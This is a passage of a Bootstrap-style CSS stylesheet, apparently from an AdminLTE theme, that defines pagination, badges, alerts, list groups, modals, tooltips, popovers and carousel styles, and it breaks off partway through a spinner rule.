.page-item:first-child .page-link {
margin-left: 0;
border-top-left-radius: 0.25rem;
border-bottom-left-radius: 0.25rem;
}
.page-item:last-child .page-link {
border-top-right-radius: 0.25rem;
border-bottom-right-radius: 0.25rem;
}
.page-item.active .page-link {
z-index: 1;
color: #ffffff;
background-color: #007bff;
border-color: #007bff;
}
.page-item.disabled .page-link {
color: #6c757d;
pointer-events: none;
cursor: auto;
background-color: #ffffff;
border-color: #dee2e6;
}
.pagination-lg .page-link {
padding: 0.75rem 1.5rem;
font-size: 1.25rem;
line-height: 1.5;
}
.pagination-lg .page-item:first-child .page-link {
border-top-left-radius: 0.3rem;
border-bottom-left-radius: 0.3rem;
}
.pagination-lg .page-item:last-child .page-link {
border-top-right-radius: 0.3rem;
border-bottom-right-radius: 0.3rem;
}
.pagination-sm .page-link {
padding: 0.25rem 0.5rem;
font-size: 0.875rem;
line-height: 1.5;
}
.pagination-sm .page-item:first-child .page-link {
border-top-left-radius: 0.2rem;
border-bottom-left-radius: 0.2rem;
}
.pagination-sm .page-item:last-child .page-link {
border-top-right-radius: 0.2rem;
border-bottom-right-radius: 0.2rem;
}
.badge {
display: inline-block;
padding: 0.25em 0.4em;
font-size: 75%;
font-weight: 700;
line-height: 1;
text-align: center;
white-space: nowrap;
vertical-align: baseline;
border-radius: 0.25rem;
transition: color 0.15s ease-in-out, background-color 0.15s ease-in-out, border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out;
}
@media (prefers-reduced-motion: reduce) {
.badge {
transition: none;
}
}
a.badge:hover, a.badge:focus {
text-decoration: none;
}
.badge:empty {
display: none;
}
.btn .badge {
position: relative;
top: -1px;
}
.badge-pill {
padding-right: 0.6em;
padding-left: 0.6em;
border-radius: 10rem;
}
.badge-primary {
color: #ffffff;
background-color: #007bff;
}
a.badge-primary:hover, a.badge-primary:focus {
color: #ffffff;
background-color: #0062cc;
}
a.badge-primary:focus, a.badge-primary.focus {
outline: 0;
box-shadow: 0 0 0 0.2rem rgba(0, 123, 255, 0.5);
}
.badge-secondary {
color: #ffffff;
background-color: #6c757d;
}
a.badge-secondary:hover, a.badge-secondary:focus {
color: #ffffff;
background-color: #545b62;
}
a.badge-secondary:focus, a.badge-secondary.focus {
outline: 0;
box-shadow: 0 0 0 0.2rem rgba(108, 117, 125, 0.5);
}
.badge-success {
color: #ffffff;
background-color: #28a745;
}
a.badge-success:hover, a.badge-success:focus {
color: #ffffff;
background-color: #1e7e34;
}
a.badge-success:focus, a.badge-success.focus {
outline: 0;
box-shadow: 0 0 0 0.2rem rgba(40, 167, 69, 0.5);
}
.badge-info {
color: #ffffff;
background-color: #17a2b8;
}
a.badge-info:hover, a.badge-info:focus {
color: #ffffff;
background-color: #117a8b;
}
a.badge-info:focus, a.badge-info.focus {
outline: 0;
box-shadow: 0 0 0 0.2rem rgba(23, 162, 184, 0.5);
}
.badge-warning {
color: #1F2D3D;
background-color: #ffc107;
}
a.badge-warning:hover, a.badge-warning:focus {
color: #1F2D3D;
background-color: #d39e00;
}
a.badge-warning:focus, a.badge-warning.focus {
outline: 0;
box-shadow: 0 0 0 0.2rem rgba(255, 193, 7, 0.5);
}
.badge-danger {
color: #ffffff;
background-color: #dc3545;
}
a.badge-danger:hover, a.badge-danger:focus {
color: #ffffff;
background-color: #bd2130;
}
a.badge-danger:focus, a.badge-danger.focus {
outline: 0;
box-shadow: 0 0 0 0.2rem rgba(220, 53, 69, 0.5);
}
.badge-light {
color: #1F2D3D;
background-color: #f8f9fa;
}
a.badge-light:hover, a.badge-light:focus {
color: #1F2D3D;
background-color: #dae0e5;
}
a.badge-light:focus, a.badge-light.focus {
outline: 0;
box-shadow: 0 0 0 0.2rem rgba(248, 249, 250, 0.5);
}
.badge-dark {
color: #ffffff;
background-color: #343a40;
}
a.badge-dark:hover, a.badge-dark:focus {
color: #ffffff;
background-color: #1d2124;
}
a.badge-dark:focus, a.badge-dark.focus {
outline: 0;
box-shadow: 0 0 0 0.2rem rgba(52, 58, 64, 0.5);
}
.jumbotron {
padding: 2rem 1rem;
margin-bottom: 2rem;
background-color: #e9ecef;
border-radius: 0.3rem;
}
@media (min-width: 576px) {
.jumbotron {
padding: 4rem 2rem;
}
}
.jumbotron-fluid {
padding-right: 0;
padding-left: 0;
border-radius: 0;
}
.alert {
position: relative;
padding: 0.75rem 1.25rem;
margin-bottom: 1rem;
border: 1px solid transparent;
border-radius: 0.25rem;
}
.alert-heading {
color: inherit;
}
.alert-link {
font-weight: 700;
}
.alert-dismissible {
padding-right: 4rem;
}
.alert-dismissible .close, .alert-dismissible .mailbox-attachment-close {
position: absolute;
top: 0;
right: 0;
padding: 0.75rem 1.25rem;
color: inherit;
}
.alert-primary {
color: #004085;
background-color: #cce5ff;
border-color: #b8daff;
}
.alert-primary hr {
border-top-color: #9fcdff;
}
.alert-primary .alert-link {
color: #002752;
}
.alert-secondary {
color: #383d41;
background-color: #e2e3e5;
border-color: #d6d8db;
}
.alert-secondary hr {
border-top-color: #c8cbcf;
}
.alert-secondary .alert-link {
color: #202326;
}
.alert-success {
color: #155724;
background-color: #d4edda;
border-color: #c3e6cb;
}
.alert-success hr {
border-top-color: #b1dfbb;
}
.alert-success .alert-link {
color: #0b2e13;
}
.alert-info {
color: #0c5460;
background-color: #d1ecf1;
border-color: #bee5eb;
}
.alert-info hr {
border-top-color: #abdde5;
}
.alert-info .alert-link {
color: #062c33;
}
.alert-warning {
color: #856404;
background-color: #fff3cd;
border-color: #ffeeba;
}
.alert-warning hr {
border-top-color: #ffe8a1;
}
.alert-warning .alert-link {
color: #533f03;
}
.alert-danger {
color: #721c24;
background-color: #f8d7da;
border-color: #f5c6cb;
}
.alert-danger hr {
border-top-color: #f1b0b7;
}
.alert-danger .alert-link {
color: #491217;
}
.alert-light {
color: #818182;
background-color: #fefefe;
border-color: #fdfdfe;
}
.alert-light hr {
border-top-color: #ececf6;
}
.alert-light .alert-link {
color: #686868;
}
.alert-dark {
color: #1b1e21;
background-color: #d6d8d9;
border-color: #c6c8ca;
}
.alert-dark hr {
border-top-color: #b9bbbe;
}
.alert-dark .alert-link {
color: #040505;
}
@-webkit-keyframes progress-bar-stripes {
from {
background-position: 1rem 0;
}
to {
background-position: 0 0;
}
}
@keyframes progress-bar-stripes {
from {
background-position: 1rem 0;
}
to {
background-position: 0 0;
}
}
.progress {
display: -ms-flexbox;
display: flex;
height: 1rem;
overflow: hidden;
font-size: 0.75rem;
background-color: #e9ecef;
border-radius: 0.25rem;
box-shadow: inset 0 0.1rem 0.1rem rgba(0, 0, 0, 0.1);
}
.progress-bar {
display: -ms-flexbox;
display: flex;
-ms-flex-direction: column;
flex-direction: column;
-ms-flex-pack: center;
justify-content: center;
color: #ffffff;
text-align: center;
white-space: nowrap;
background-color: #007bff;
transition: width 0.6s ease;
}
@media (prefers-reduced-motion: reduce) {
.progress-bar {
transition: none;
}
}
.progress-bar-striped {
background-image: linear-gradient(45deg, rgba(255, 255, 255, 0.15) 25%, transparent 25%, transparent 50%, rgba(255, 255, 255, 0.15) 50%, rgba(255, 255, 255, 0.15) 75%, transparent 75%, transparent);
background-size: 1rem 1rem;
}
.progress-bar-animated {
-webkit-animation: progress-bar-stripes 1s linear infinite;
animation: progress-bar-stripes 1s linear infinite;
}
@media (prefers-reduced-motion: reduce) {
.progress-bar-animated {
-webkit-animation: none;
animation: none;
}
}
.media {
display: -ms-flexbox;
display: flex;
-ms-flex-align: start;
align-items: flex-start;
}
.media-body {
-ms-flex: 1;
flex: 1;
}
.list-group {
display: -ms-flexbox;
display: flex;
-ms-flex-direction: column;
flex-direction: column;
padding-left: 0;
margin-bottom: 0;
}
.list-group-item-action {
width: 100%;
color: #495057;
text-align: inherit;
}
.list-group-item-action:hover, .list-group-item-action:focus {
z-index: 1;
color: #495057;
text-decoration: none;
background-color: #f8f9fa;
}
.list-group-item-action:active {
color: #212529;
background-color: #e9ecef;
}
.list-group-item {
position: relative;
display: block;
padding: 0.75rem 1.25rem;
margin-bottom: -1px;
background-color: #ffffff;
border: 1px solid rgba(0, 0, 0, 0.125);
}
.list-group-item:first-child {
border-top-left-radius: 0.25rem;
border-top-right-radius: 0.25rem;
}
.list-group-item:last-child {
margin-bottom: 0;
border-bottom-right-radius: 0.25rem;
border-bottom-left-radius: 0.25rem;
}
.list-group-item.disabled, .list-group-item:disabled {
color: #6c757d;
pointer-events: none;
background-color: #ffffff;
}
.list-group-item.active {
z-index: 2;
color: #ffffff;
background-color: #007bff;
border-color: #007bff;
}
.list-group-horizontal {
-ms-flex-direction: row;
flex-direction: row;
}
.list-group-horizontal .list-group-item {
margin-right: -1px;
margin-bottom: 0;
}
.list-group-horizontal .list-group-item:first-child {
border-top-left-radius: 0.25rem;
border-bottom-left-radius: 0.25rem;
border-top-right-radius: 0;
}
.list-group-horizontal .list-group-item:last-child {
margin-right: 0;
border-top-right-radius: 0.25rem;
border-bottom-right-radius: 0.25rem;
border-bottom-left-radius: 0;
}
@media (min-width: 576px) {
.list-group-horizontal-sm {
-ms-flex-direction: row;
flex-direction: row;
}
.list-group-horizontal-sm .list-group-item {
margin-right: -1px;
margin-bottom: 0;
}
.list-group-horizontal-sm .list-group-item:first-child {
border-top-left-radius: 0.25rem;
border-bottom-left-radius: 0.25rem;
border-top-right-radius: 0;
}
.list-group-horizontal-sm .list-group-item:last-child {
margin-right: 0;
border-top-right-radius: 0.25rem;
border-bottom-right-radius: 0.25rem;
border-bottom-left-radius: 0;
}
}
@media (min-width: 768px) {
.list-group-horizontal-md {
-ms-flex-direction: row;
flex-direction: row;
}
.list-group-horizontal-md .list-group-item {
margin-right: -1px;
margin-bottom: 0;
}
.list-group-horizontal-md .list-group-item:first-child {
border-top-left-radius: 0.25rem;
border-bottom-left-radius: 0.25rem;
border-top-right-radius: 0;
}
.list-group-horizontal-md .list-group-item:last-child {
margin-right: 0;
border-top-right-radius: 0.25rem;
border-bottom-right-radius: 0.25rem;
border-bottom-left-radius: 0;
}
}
@media (min-width: 992px) {
.list-group-horizontal-lg {
-ms-flex-direction: row;
flex-direction: row;
}
.list-group-horizontal-lg .list-group-item {
margin-right: -1px;
margin-bottom: 0;
}
.list-group-horizontal-lg .list-group-item:first-child {
border-top-left-radius: 0.25rem;
border-bottom-left-radius: 0.25rem;
border-top-right-radius: 0;
}
.list-group-horizontal-lg .list-group-item:last-child {
margin-right: 0;
border-top-right-radius: 0.25rem;
border-bottom-right-radius: 0.25rem;
border-bottom-left-radius: 0;
}
}
@media (min-width: 1200px) {
.list-group-horizontal-xl {
-ms-flex-direction: row;
flex-direction: row;
}
.list-group-horizontal-xl .list-group-item {
margin-right: -1px;
margin-bottom: 0;
}
.list-group-horizontal-xl .list-group-item:first-child {
border-top-left-radius: 0.25rem;
border-bottom-left-radius: 0.25rem;
border-top-right-radius: 0;
}
.list-group-horizontal-xl .list-group-item:last-child {
margin-right: 0;
border-top-right-radius: 0.25rem;
border-bottom-right-radius: 0.25rem;
border-bottom-left-radius: 0;
}
}
.list-group-flush .list-group-item {
border-right: 0;
border-left: 0;
border-radius: 0;
}
.list-group-flush .list-group-item:last-child {
margin-bottom: -1px;
}
.list-group-flush:first-child .list-group-item:first-child {
border-top: 0;
}
.list-group-flush:last-child .list-group-item:last-child {
margin-bottom: 0;
border-bottom: 0;
}
.list-group-item-primary {
color: #004085;
background-color: #b8daff;
}
.list-group-item-primary.list-group-item-action:hover, .list-group-item-primary.list-group-item-action:focus {
color: #004085;
background-color: #9fcdff;
}
.list-group-item-primary.list-group-item-action.active {
color: #ffffff;
background-color: #004085;
border-color: #004085;
}
.list-group-item-secondary {
color: #383d41;
background-color: #d6d8db;
}
.list-group-item-secondary.list-group-item-action:hover, .list-group-item-secondary.list-group-item-action:focus {
color: #383d41;
background-color: #c8cbcf;
}
.list-group-item-secondary.list-group-item-action.active {
color: #ffffff;
background-color: #383d41;
border-color: #383d41;
}
.list-group-item-success {
color: #155724;
background-color: #c3e6cb;
}
.list-group-item-success.list-group-item-action:hover, .list-group-item-success.list-group-item-action:focus {
color: #155724;
background-color: #b1dfbb;
}
.list-group-item-success.list-group-item-action.active {
color: #ffffff;
background-color: #155724;
border-color: #155724;
}
.list-group-item-info {
color: #0c5460;
background-color: #bee5eb;
}
.list-group-item-info.list-group-item-action:hover, .list-group-item-info.list-group-item-action:focus {
color: #0c5460;
background-color: #abdde5;
}
.list-group-item-info.list-group-item-action.active {
color: #ffffff;
background-color: #0c5460;
border-color: #0c5460;
}
.list-group-item-warning {
color: #856404;
background-color: #ffeeba;
}
.list-group-item-warning.list-group-item-action:hover, .list-group-item-warning.list-group-item-action:focus {
color: #856404;
background-color: #ffe8a1;
}
.list-group-item-warning.list-group-item-action.active {
color: #ffffff;
background-color: #856404;
border-color: #856404;
}
.list-group-item-danger {
color: #721c24;
background-color: #f5c6cb;
}
.list-group-item-danger.list-group-item-action:hover, .list-group-item-danger.list-group-item-action:focus {
color: #721c24;
background-color: #f1b0b7;
}
.list-group-item-danger.list-group-item-action.active {
color: #ffffff;
background-color: #721c24;
border-color: #721c24;
}
.list-group-item-light {
color: #818182;
background-color: #fdfdfe;
}
.list-group-item-light.list-group-item-action:hover, .list-group-item-light.list-group-item-action:focus {
color: #818182;
background-color: #ececf6;
}
.list-group-item-light.list-group-item-action.active {
color: #ffffff;
background-color: #818182;
border-color: #818182;
}
.list-group-item-dark {
color: #1b1e21;
background-color: #c6c8ca;
}
.list-group-item-dark.list-group-item-action:hover, .list-group-item-dark.list-group-item-action:focus {
color: #1b1e21;
background-color: #b9bbbe;
}
.list-group-item-dark.list-group-item-action.active {
color: #ffffff;
background-color: #1b1e21;
border-color: #1b1e21;
}
.close, .mailbox-attachment-close {
float: right;
font-size: 1.5rem;
font-weight: 700;
line-height: 1;
color: #000;
text-shadow: 0 1px 0 #ffffff;
opacity: .5;
}
.close:hover, .mailbox-attachment-close:hover {
color: #000;
text-decoration: none;
}
.close:not(:disabled):not(.disabled):hover, .mailbox-attachment-close:not(:disabled):not(.disabled):hover, .close:not(:disabled):not(.disabled):focus, .mailbox-attachment-close:not(:disabled):not(.disabled):focus {
opacity: .75;
}
button.close, button.mailbox-attachment-close {
padding: 0;
background-color: transparent;
border: 0;
-webkit-appearance: none;
-moz-appearance: none;
appearance: none;
}
a.close.disabled, a.disabled.mailbox-attachment-close {
pointer-events: none;
}
.toast {
max-width: 350px;
overflow: hidden;
font-size: 0.875rem;
background-color: rgba(255, 255, 255, 0.85);
background-clip: padding-box;
border: 1px solid rgba(0, 0, 0, 0.1);
box-shadow: 0 0.25rem 0.75rem rgba(0, 0, 0, 0.1);
-webkit-backdrop-filter: blur(10px);
backdrop-filter: blur(10px);
opacity: 0;
border-radius: 0.25rem;
}
.toast:not(:last-child) {
margin-bottom: 0.75rem;
}
.toast.showing {
opacity: 1;
}
.toast.show {
display: block;
opacity: 1;
}
.toast.hide {
display: none;
}
.toast-header {
display: -ms-flexbox;
display: flex;
-ms-flex-align: center;
align-items: center;
padding: 0.25rem 0.75rem;
color: #6c757d;
background-color: rgba(255, 255, 255, 0.85);
background-clip: padding-box;
border-bottom: 1px solid rgba(0, 0, 0, 0.05);
}
.toast-body {
padding: 0.75rem;
}
.modal-open {
overflow: hidden;
}
.modal-open .modal {
overflow-x: hidden;
overflow-y: auto;
}
.modal {
position: fixed;
top: 0;
left: 0;
z-index: 1050;
display: none;
width: 100%;
height: 100%;
overflow: hidden;
outline: 0;
}
.modal-dialog {
position: relative;
width: auto;
margin: 0.5rem;
pointer-events: none;
}
.modal.fade .modal-dialog {
transition: -webkit-transform 0.3s ease-out;
transition: transform 0.3s ease-out;
transition: transform 0.3s ease-out, -webkit-transform 0.3s ease-out;
-webkit-transform: translate(0, -50px);
transform: translate(0, -50px);
}
@media (prefers-reduced-motion: reduce) {
.modal.fade .modal-dialog {
transition: none;
}
}
.modal.show .modal-dialog {
-webkit-transform: none;
transform: none;
}
.modal-dialog-scrollable {
display: -ms-flexbox;
display: flex;
max-height: calc(100% - 1rem);
}
.modal-dialog-scrollable .modal-content {
max-height: calc(100vh - 1rem);
overflow: hidden;
}
.modal-dialog-scrollable .modal-header,
.modal-dialog-scrollable .modal-footer {
-ms-flex-negative: 0;
flex-shrink: 0;
}
.modal-dialog-scrollable .modal-body {
overflow-y: auto;
}
.modal-dialog-centered {
display: -ms-flexbox;
display: flex;
-ms-flex-align: center;
align-items: center;
min-height: calc(100% - 1rem);
}
.modal-dialog-centered::before {
display: block;
height: calc(100vh - 1rem);
content: "";
}
.modal-dialog-centered.modal-dialog-scrollable {
-ms-flex-direction: column;
flex-direction: column;
-ms-flex-pack: center;
justify-content: center;
height: 100%;
}
.modal-dialog-centered.modal-dialog-scrollable .modal-content {
max-height: none;
}
.modal-dialog-centered.modal-dialog-scrollable::before {
content: none;
}
.modal-content {
position: relative;
display: -ms-flexbox;
display: flex;
-ms-flex-direction: column;
flex-direction: column;
width: 100%;
pointer-events: auto;
background-color: #ffffff;
background-clip: padding-box;
border: 1px solid rgba(0, 0, 0, 0.2);
border-radius: 0.3rem;
box-shadow: 0 0.25rem 0.5rem rgba(0, 0, 0, 0.5);
outline: 0;
}
.modal-backdrop {
position: fixed;
top: 0;
left: 0;
z-index: 1040;
width: 100vw;
height: 100vh;
background-color: #000;
}
.modal-backdrop.fade {
opacity: 0;
}
.modal-backdrop.show {
opacity: 0.5;
}
.modal-header {
display: -ms-flexbox;
display: flex;
-ms-flex-align: start;
align-items: flex-start;
-ms-flex-pack: justify;
justify-content: space-between;
padding: 1rem;
border-bottom: 1px solid #e9ecef;
border-top-left-radius: 0.3rem;
border-top-right-radius: 0.3rem;
}
.modal-header .close, .modal-header .mailbox-attachment-close {
padding: 1rem;
margin: -1rem -1rem -1rem auto;
}
.modal-title {
margin-bottom: 0;
line-height: 1.5;
}
.modal-body {
position: relative;
-ms-flex: 1 1 auto;
flex: 1 1 auto;
padding: 1rem;
}
.modal-footer {
display: -ms-flexbox;
display: flex;
-ms-flex-align: center;
align-items: center;
-ms-flex-pack: end;
justify-content: flex-end;
padding: 1rem;
border-top: 1px solid #e9ecef;
border-bottom-right-radius: 0.3rem;
border-bottom-left-radius: 0.3rem;
}
.modal-footer > :not(:first-child) {
margin-left: .25rem;
}
.modal-footer > :not(:last-child) {
margin-right: .25rem;
}
.modal-scrollbar-measure {
position: absolute;
top: -9999px;
width: 50px;
height: 50px;
overflow: scroll;
}
@media (min-width: 576px) {
.modal-dialog {
max-width: 500px;
margin: 1.75rem auto;
}
.modal-dialog-scrollable {
max-height: calc(100% - 3.5rem);
}
.modal-dialog-scrollable .modal-content {
max-height: calc(100vh - 3.5rem);
}
.modal-dialog-centered {
min-height: calc(100% - 3.5rem);
}
.modal-dialog-centered::before {
height: calc(100vh - 3.5rem);
}
.modal-content {
box-shadow: 0 0.5rem 1rem rgba(0, 0, 0, 0.5);
}
.modal-sm {
max-width: 300px;
}
}
@media (min-width: 992px) {
.modal-lg,
.modal-xl {
max-width: 800px;
}
}
@media (min-width: 1200px) {
.modal-xl {
max-width: 1140px;
}
}
.tooltip {
position: absolute;
z-index: 1070;
display: block;
margin: 0;
font-family: "Source Sans Pro", -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol";
font-style: normal;
font-weight: 400;
line-height: 1.5;
text-align: left;
text-align: start;
text-decoration: none;
text-shadow: none;
text-transform: none;
letter-spacing: normal;
word-break: normal;
word-spacing: normal;
white-space: normal;
line-break: auto;
font-size: 0.875rem;
word-wrap: break-word;
opacity: 0;
}
.tooltip.show {
opacity: 0.9;
}
.tooltip .arrow {
position: absolute;
display: block;
width: 0.8rem;
height: 0.4rem;
}
.tooltip .arrow::before {
position: absolute;
content: "";
border-color: transparent;
border-style: solid;
}
.bs-tooltip-top, .bs-tooltip-auto[x-placement^="top"] {
padding: 0.4rem 0;
}
.bs-tooltip-top .arrow, .bs-tooltip-auto[x-placement^="top"] .arrow {
bottom: 0;
}
.bs-tooltip-top .arrow::before, .bs-tooltip-auto[x-placement^="top"] .arrow::before {
top: 0;
border-width: 0.4rem 0.4rem 0;
border-top-color: #000;
}
.bs-tooltip-right, .bs-tooltip-auto[x-placement^="right"] {
padding: 0 0.4rem;
}
.bs-tooltip-right .arrow, .bs-tooltip-auto[x-placement^="right"] .arrow {
left: 0;
width: 0.4rem;
height: 0.8rem;
}
.bs-tooltip-right .arrow::before, .bs-tooltip-auto[x-placement^="right"] .arrow::before {
right: 0;
border-width: 0.4rem 0.4rem 0.4rem 0;
border-right-color: #000;
}
.bs-tooltip-bottom, .bs-tooltip-auto[x-placement^="bottom"] {
padding: 0.4rem 0;
}
.bs-tooltip-bottom .arrow, .bs-tooltip-auto[x-placement^="bottom"] .arrow {
top: 0;
}
.bs-tooltip-bottom .arrow::before, .bs-tooltip-auto[x-placement^="bottom"] .arrow::before {
bottom: 0;
border-width: 0 0.4rem 0.4rem;
border-bottom-color: #000;
}
.bs-tooltip-left, .bs-tooltip-auto[x-placement^="left"] {
padding: 0 0.4rem;
}
.bs-tooltip-left .arrow, .bs-tooltip-auto[x-placement^="left"] .arrow {
right: 0;
width: 0.4rem;
height: 0.8rem;
}
.bs-tooltip-left .arrow::before, .bs-tooltip-auto[x-placement^="left"] .arrow::before {
left: 0;
border-width: 0.4rem 0 0.4rem 0.4rem;
border-left-color: #000;
}
.tooltip-inner {
max-width: 200px;
padding: 0.25rem 0.5rem;
color: #ffffff;
text-align: center;
background-color: #000;
border-radius: 0.25rem;
}
.popover {
position: absolute;
top: 0;
left: 0;
z-index: 1060;
display: block;
max-width: 276px;
font-family: "Source Sans Pro", -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol";
font-style: normal;
font-weight: 400;
line-height: 1.5;
text-align: left;
text-align: start;
text-decoration: none;
text-shadow: none;
text-transform: none;
letter-spacing: normal;
word-break: normal;
word-spacing: normal;
white-space: normal;
line-break: auto;
font-size: 0.875rem;
word-wrap: break-word;
background-color: #ffffff;
background-clip: padding-box;
border: 1px solid rgba(0, 0, 0, 0.2);
border-radius: 0.3rem;
box-shadow: 0 0.25rem 0.5rem rgba(0, 0, 0, 0.2);
}
.popover .arrow {
position: absolute;
display: block;
width: 1rem;
height: 0.5rem;
margin: 0 0.3rem;
}
.popover .arrow::before, .popover .arrow::after {
position: absolute;
display: block;
content: "";
border-color: transparent;
border-style: solid;
}
.bs-popover-top, .bs-popover-auto[x-placement^="top"] {
margin-bottom: 0.5rem;
}
.bs-popover-top > .arrow, .bs-popover-auto[x-placement^="top"] > .arrow {
bottom: calc((0.5rem + 1px) * -1);
}
.bs-popover-top > .arrow::before, .bs-popover-auto[x-placement^="top"] > .arrow::before {
bottom: 0;
border-width: 0.5rem 0.5rem 0;
border-top-color: rgba(0, 0, 0, 0.25);
}
.bs-popover-top > .arrow::after, .bs-popover-auto[x-placement^="top"] > .arrow::after {
bottom: 1px;
border-width: 0.5rem 0.5rem 0;
border-top-color: #ffffff;
}
.bs-popover-right, .bs-popover-auto[x-placement^="right"] {
margin-left: 0.5rem;
}
.bs-popover-right > .arrow, .bs-popover-auto[x-placement^="right"] > .arrow {
left: calc((0.5rem + 1px) * -1);
width: 0.5rem;
height: 1rem;
margin: 0.3rem 0;
}
.bs-popover-right > .arrow::before, .bs-popover-auto[x-placement^="right"] > .arrow::before {
left: 0;
border-width: 0.5rem 0.5rem 0.5rem 0;
border-right-color: rgba(0, 0, 0, 0.25);
}
.bs-popover-right > .arrow::after, .bs-popover-auto[x-placement^="right"] > .arrow::after {
left: 1px;
border-width: 0.5rem 0.5rem 0.5rem 0;
border-right-color: #ffffff;
}
.bs-popover-bottom, .bs-popover-auto[x-placement^="bottom"] {
margin-top: 0.5rem;
}
.bs-popover-bottom > .arrow, .bs-popover-auto[x-placement^="bottom"] > .arrow {
top: calc((0.5rem + 1px) * -1);
}
.bs-popover-bottom > .arrow::before, .bs-popover-auto[x-placement^="bottom"] > .arrow::before {
top: 0;
border-width: 0 0.5rem 0.5rem 0.5rem;
border-bottom-color: rgba(0, 0, 0, 0.25);
}
.bs-popover-bottom > .arrow::after, .bs-popover-auto[x-placement^="bottom"] > .arrow::after {
top: 1px;
border-width: 0 0.5rem 0.5rem 0.5rem;
border-bottom-color: #ffffff;
}
.bs-popover-bottom .popover-header::before, .bs-popover-auto[x-placement^="bottom"] .popover-header::before {
position: absolute;
top: 0;
left: 50%;
display: block;
width: 1rem;
margin-left: -0.5rem;
content: "";
border-bottom: 1px solid #f7f7f7;
}
.bs-popover-left, .bs-popover-auto[x-placement^="left"] {
margin-right: 0.5rem;
}
.bs-popover-left > .arrow, .bs-popover-auto[x-placement^="left"] > .arrow {
right: calc((0.5rem + 1px) * -1);
width: 0.5rem;
height: 1rem;
margin: 0.3rem 0;
}
.bs-popover-left > .arrow::before, .bs-popover-auto[x-placement^="left"] > .arrow::before {
right: 0;
border-width: 0.5rem 0 0.5rem 0.5rem;
border-left-color: rgba(0, 0, 0, 0.25);
}
.bs-popover-left > .arrow::after, .bs-popover-auto[x-placement^="left"] > .arrow::after {
right: 1px;
border-width: 0.5rem 0 0.5rem 0.5rem;
border-left-color: #ffffff;
}
.popover-header {
padding: 0.5rem 0.75rem;
margin-bottom: 0;
font-size: 1rem;
color: inherit;
background-color: #f7f7f7;
border-bottom: 1px solid #ebebeb;
border-top-left-radius: calc(0.3rem - 1px);
border-top-right-radius: calc(0.3rem - 1px);
}
.popover-header:empty {
display: none;
}
.popover-body {
padding: 0.5rem 0.75rem;
color: #212529;
}
.carousel {
position: relative;
}
.carousel.pointer-event {
-ms-touch-action: pan-y;
touch-action: pan-y;
}
.carousel-inner {
position: relative;
width: 100%;
overflow: hidden;
}
.carousel-inner::after {
display: block;
clear: both;
content: "";
}
.carousel-item {
position: relative;
display: none;
float: left;
width: 100%;
margin-right: -100%;
-webkit-backface-visibility: hidden;
backface-visibility: hidden;
transition: -webkit-transform 0.6s ease;
transition: transform 0.6s ease;
transition: transform 0.6s ease, -webkit-transform 0.6s ease;
}
@media (prefers-reduced-motion: reduce) {
.carousel-item {
transition: none;
}
}
.carousel-item.active,
.carousel-item-next,
.carousel-item-prev {
display: block;
}
.carousel-item-next:not(.carousel-item-left),
.active.carousel-item-right {
-webkit-transform: translateX(100%);
transform: translateX(100%);
}
.carousel-item-prev:not(.carousel-item-right),
.active.carousel-item-left {
-webkit-transform: translateX(-100%);
transform: translateX(-100%);
}
.carousel-fade .carousel-item {
opacity: 0;
transition-property: opacity;
-webkit-transform: none;
transform: none;
}
.carousel-fade .carousel-item.active,
.carousel-fade .carousel-item-next.carousel-item-left,
.carousel-fade .carousel-item-prev.carousel-item-right {
z-index: 1;
opacity: 1;
}
.carousel-fade .active.carousel-item-left,
.carousel-fade .active.carousel-item-right {
z-index: 0;
opacity: 0;
transition: 0s 0.6s opacity;
}
@media (prefers-reduced-motion: reduce) {
.carousel-fade .active.carousel-item-left,
.carousel-fade .active.carousel-item-right {
transition: none;
}
}
.carousel-control-prev,
.carousel-control-next {
position: absolute;
top: 0;
bottom: 0;
z-index: 1;
display: -ms-flexbox;
display: flex;
-ms-flex-align: center;
align-items: center;
-ms-flex-pack: center;
justify-content: center;
width: 15%;
color: #ffffff;
text-align: center;
opacity: 0.5;
transition: opacity 0.15s ease;
}
@media (prefers-reduced-motion: reduce) {
.carousel-control-prev,
.carousel-control-next {
transition: none;
}
}
.carousel-control-prev:hover, .carousel-control-prev:focus,
.carousel-control-next:hover,
.carousel-control-next:focus {
color: #ffffff;
text-decoration: none;
outline: 0;
opacity: 0.9;
}
.carousel-control-prev {
left: 0;
}
.carousel-control-next {
right: 0;
}
.carousel-control-prev-icon,
.carousel-control-next-icon {
display: inline-block;
width: 20px;
height: 20px;
background: no-repeat 50% / 100% 100%;
}
.carousel-control-prev-icon {
background-image: url("data:image/svg+xml;charset=utf8,%3Csvg xmlns='http://www.w3.org/2000/svg' fill='%23ffffff' viewBox='0 0 8 8'%3E%3Cpath d='M5.25 0l-4 4 4 4 1.5-1.5-2.5-2.5 2.5-2.5-1.5-1.5z'/%3E%3C/svg%3E");
}
.carousel-control-next-icon {
background-image: url("data:image/svg+xml;charset=utf8,%3Csvg xmlns='http://www.w3.org/2000/svg' fill='%23ffffff' viewBox='0 0 8 8'%3E%3Cpath d='M2.75 0l-1.5 1.5 2.5 2.5-2.5 2.5 1.5 1.5 4-4-4-4z'/%3E%3C/svg%3E");
}
.carousel-indicators {
position: absolute;
right: 0;
bottom: 0;
left: 0;
z-index: 15;
display: -ms-flexbox;
display: flex;
-ms-flex-pack: center;
justify-content: center;
padding-left: 0;
margin-right: 15%;
margin-left: 15%;
list-style: none;
}
.carousel-indicators li {
box-sizing: content-box;
-ms-flex: 0 1 auto;
flex: 0 1 auto;
width: 30px;
height: 3px;
margin-right: 3px;
margin-left: 3px;
text-indent: -999px;
cursor: pointer;
background-color: #ffffff;
background-clip: padding-box;
border-top: 10px solid transparent;
border-bottom: 10px solid transparent;
opacity: .5;
transition: opacity 0.6s ease;
}
@media (prefers-reduced-motion: reduce) {
.carousel-indicators li {
transition: none;
}
}
.carousel-indicators .active {
opacity: 1;
}
.carousel-caption {
position: absolute;
right: 15%;
bottom: 20px;
left: 15%;
z-index: 10;
padding-top: 20px;
padding-bottom: 20px;
color: #ffffff;
text-align: center;
}
@-webkit-keyframes spinner-border {
to {
-webkit-transform: rotate(360deg);
transform: rotate(360deg);
}
}
@keyframes spinner-border {
to {
-webkit-transform: rotate(360deg);
transform: rotate(360deg);
}
}
.spinner-border {
display: inline-block;
width: 2rem;
